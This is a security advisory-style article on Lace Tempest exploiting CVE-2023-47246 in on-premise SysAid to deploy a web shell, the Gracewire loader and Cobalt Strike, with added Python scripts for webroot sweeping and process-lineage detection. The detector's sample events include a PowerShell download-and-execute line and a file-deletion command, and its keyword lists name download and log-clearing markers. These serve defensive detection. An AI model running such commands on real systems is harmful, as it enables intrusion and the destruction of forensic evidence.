Lace Tempest Exploits SysAid IT Support Software Vulnerability: Stay Informed with Shiv Telegram Media
Title: Lace Tempest Exploits Zero-Day Flaw in SysAid Software to Deliver Ransomware
Introduction:
Lace Tempest, the threat actor Microsoft tracks as the group behind Cl0p ransomware deployments, has recently targeted on-premise SysAid IT support software in what Microsoft describes as limited attacks. By exploiting a zero-day vulnerability in SysAid, Lace Tempest obtained code execution on the server and used it to run a malware loader for the Gracewire malware, giving the actor a foothold inside the affected organizations.
Body:
The attack is the latest in a series of zero-day campaigns by Lace Tempest. The same actor previously exploited zero-day vulnerabilities in Progress MOVEit Transfer and in PaperCut print-management servers, in each case abusing an internet-facing business application as the initial access vector. The pattern is consistent: find a widely deployed server product, exploit it before a patch exists, and use the foothold for data theft and extortion.
The newly disclosed vulnerability, tracked as CVE-2023-47246, is a path traversal flaw in the on-premise SysAid server. Because the traversal lets an unauthenticated attacker write files to locations the application was never meant to expose, it can be chained into code execution on the server, and from there into data theft across the environment.
SysAid, the vendor affected by this exploit, has released a fix: version 23.3.36 of the on-premise server closes the vulnerability. Organizations running on-premise SysAid are strongly advised to upgrade immediately and, because the flaw was exploited before the patch existed, to treat patching alone as insufficient: the SysAid server and its Tomcat webroot should be checked for signs of prior compromise, and any credentials the server held should be reviewed.
Lace Tempest's attack chain used the path traversal to deliver its payloads. The actor uploaded a WAR archive containing a web shell and other malicious payloads into the webroot of the SysAid Tomcat web service, where Tomcat's automatic deployment of WAR files turned a file write into code execution under the SysAid service account.
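The two checks a practitioner would want after reading the patch advice and the WAR-upload description above are a version comparison against the fixed release and a sweep of the Tomcat webroot for WAR archives or JSP files that do not belong to a known application. The following is an added example written for this page, not code from SysAid or from any incident report. It assumes a conventional Tomcat layout (a `webapps` directory holding one top-level entry per application) and that the set of expected application names in `KNOWN_APPS` has been taken from a known-good install; the sample files it creates are constructed for the demonstration.

```python
import os
import tempfile
from typing import Iterable, List, Tuple

# SysAid on-premise release that fixes CVE-2023-47246 (from the vendor advisory).
FIXED_VERSION = (23, 3, 36)

# ASSUMPTION: expected top-level entries under Tomcat's webapps/ on a SysAid host.
# Take this list from a known-good deployment; it varies between installs.
KNOWN_APPS = {"ROOT", "sysaid"}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '23.3.35' into (23, 3, 35) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True when the installed build predates the fixed release."""
    return parse_version(version) < FIXED_VERSION


def suspicious_webroot_entries(relative_paths: Iterable[str],
                               known_apps=KNOWN_APPS) -> List[str]:
    """Flag entries that look like a dropped WAR archive or an unpacked web shell.

    Rules (paths are relative to webapps/):
      * any .war whose base name is not an expected application, or that sits
        below the top level, where Tomcat would never legitimately deploy it;
      * any .jsp/.jspx file inside a top-level directory that is not an expected
        application (the unpacked contents of a dropped WAR).
    """
    findings = []
    for rel in relative_paths:
        norm = rel.replace("\\", "/").lstrip("/")
        top = norm.split("/", 1)[0]
        lower = norm.lower()
        if lower.endswith(".war"):
            if "/" in norm or norm[:-4] not in known_apps:
                findings.append(norm)
        elif lower.endswith((".jsp", ".jspx")) and top not in known_apps:
            findings.append(norm)
    return findings


def scan_webroot(root: str, known_apps=KNOWN_APPS) -> List[str]:
    """Walk a real webapps directory and apply the same rules, sorted for stable output."""
    rels = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            rels.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(suspicious_webroot_entries(rels, known_apps))


def demo() -> List[str]:
    """Build a constructed webapps/ tree containing one planted WAR and scan it."""
    with tempfile.TemporaryDirectory() as root:
        # Legitimate-looking entries (constructed).
        os.makedirs(os.path.join(root, "sysaid", "WEB-INF"))
        open(os.path.join(root, "sysaid.war"), "w").close()
        open(os.path.join(root, "sysaid", "WEB-INF", "web.xml"), "w").close()
        open(os.path.join(root, "sysaid", "index.jsp"), "w").close()
        # Planted archive plus its auto-deployed web shell (constructed names).
        os.makedirs(os.path.join(root, "help"))
        open(os.path.join(root, "help.war"), "w").close()
        open(os.path.join(root, "help", "cmd.jsp"), "w").close()
        return scan_webroot(root)


if __name__ == "__main__":
    print("23.3.35 vulnerable:", is_vulnerable_version("23.3.35"))
    print("suspicious entries:", demo())
```

The webroot rules are deliberately narrow so the output stays reviewable; a web shell dropped directly inside a legitimate application directory would not trip them, so pair the sweep with a file-integrity baseline or a modification-time filter around the suspected window.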
The web shell serves two purposes: it gives the actor persistent command execution on the compromised host, and it is used to launch a PowerShell script that runs the Gracewire loader. A second PowerShell script then deletes the dropped files and other traces of the exploitation, which is why investigators should not rely on finding the original WAR archive and should instead look at process lineage, Tomcat and web server logs, and any endpoint telemetry that captured the PowerShell executions.
Lace Tempest then used the MeshCentral Agent, a legitimate remote-management tool, together with PowerShell to download and execute Cobalt Strike, a commercial adversary-simulation framework that is routinely abused as a post-exploitation toolkit. Living off legitimate tooling in this way blends the intrusion into ordinary administrative activity and makes detection harder for organizations that do not baseline which remote-management agents belong in their environment.
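Because the cleanup script removes the file-system evidence, the durable signal from the chain described above is process lineage: a shell spawned by Tomcat's JVM (the web shell running commands), a shell spawned by the remote-management agent, PowerShell command lines that download or decode content, and command lines that delete files or clear logs. The following is an added example for this page, not detection content from SysAid, Microsoft or any vendor, showing those rules run over constructed JSON-formatted process-creation events. The process names for the Tomcat JVM (`java.exe`) and the MeshCentral agent (`meshagent.exe`) and the URL in the sample are assumptions made for the demonstration.

```python
import json
from typing import Dict, Iterable, List, Tuple

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# ASSUMPTION: image names of Tomcat's JVM and the MeshCentral agent on Windows.
TOMCAT_IMAGES = {"java.exe", "tomcat9.exe"}
MESH_AGENT_IMAGES = {"meshagent.exe"}
# Heuristic command-line markers; case-insensitive substring matches.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "iex", "-enc", "-encodedcommand")
CLEANUP_MARKERS = ("remove-item", "wevtutil cl", "clear-eventlog", " del ", " rd ", "rmdir")

# Constructed process-creation events (Sysmon-style field names, one JSON object per line).
SAMPLE_EVENTS = r'''
{"UtcTime": "2023-11-08 10:15:02", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\SysAidServer\\tomcat\\bin\\java.exe", "CommandLine": "powershell -nop -w hidden -ep bypass -f C:\\Windows\\Temp\\run.ps1"}
{"UtcTime": "2023-11-08 10:16:40", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell Get-Date"}
{"UtcTime": "2023-11-08 10:21:11", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Mesh Agent\\meshagent.exe", "CommandLine": "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/a')\""}
{"UtcTime": "2023-11-08 10:30:05", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\SysAidServer\\tomcat\\bin\\java.exe", "CommandLine": "cmd /c del C:\\Program Files\\SysAidServer\\tomcat\\webapps\\help.war"}
'''


def _basename(path: str) -> str:
    """Lower-cased file name regardless of slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the list of rule names an event matches (empty when benign)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if image not in SHELLS:
        return hits
    if parent in TOMCAT_IMAGES:
        hits.append("shell spawned by Tomcat JVM (web shell execution)")
    if parent in MESH_AGENT_IMAGES:
        hits.append("shell spawned by MeshCentral agent")
    if any(marker in cmd for marker in DOWNLOAD_MARKERS):
        hits.append("PowerShell download/encoded command")
    if any(marker in cmd for marker in CLEANUP_MARKERS):
        hits.append("possible anti-forensic cleanup")
    return hits


def detect(lines: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Parse JSON event lines and return (timestamp, matched rules) for each hit."""
    results = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        hits = classify(event)
        if hits:
            results.append((event.get("UtcTime", "?"), hits))
    return results


if __name__ == "__main__":
    for ts, rules in detect(SAMPLE_EVENTS.splitlines()):
        print(ts, "->", "; ".join(rules))
```

The first rule is the one worth keeping even after the window of this campaign closes: a Java process for an IT-support web application has no routine reason to spawn PowerShell or cmd.exe, so that lineage is a low-noise indicator of a web shell on any Tomcat-hosted product, not only SysAid.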
Separately, the FBI has warned that ransomware and extortion actors are increasingly reaching victims through third-party vendors and legitimate system tools rather than through custom malware. The Silent Ransom Group (SRG), also known as Luna Moth, has carried out extensive callback phishing campaigns for data theft and extortion: the victim receives an email claiming a pending charge and a phone number to call, the operator on the line talks them into installing a legitimate remote system-management tool, and the actor then uses that tool to compromise local files and network shares, exfiltrate data, and extort the company.
Conclusion:
Threat actors like Lace Tempest continue to look for new internet-facing products to exploit before patches exist, and SysAid's quick release of a fix shows why zero-day reports need to be turned around fast. Patching closes the door going forward but does not undo an intrusion that already happened, so organizations running on-premise SysAid should upgrade to 23.3.36 or later and then examine the server, its Tomcat webroot, and their endpoint telemetry for evidence of the web shell, PowerShell, MeshCentral and Cobalt Strike activity described above.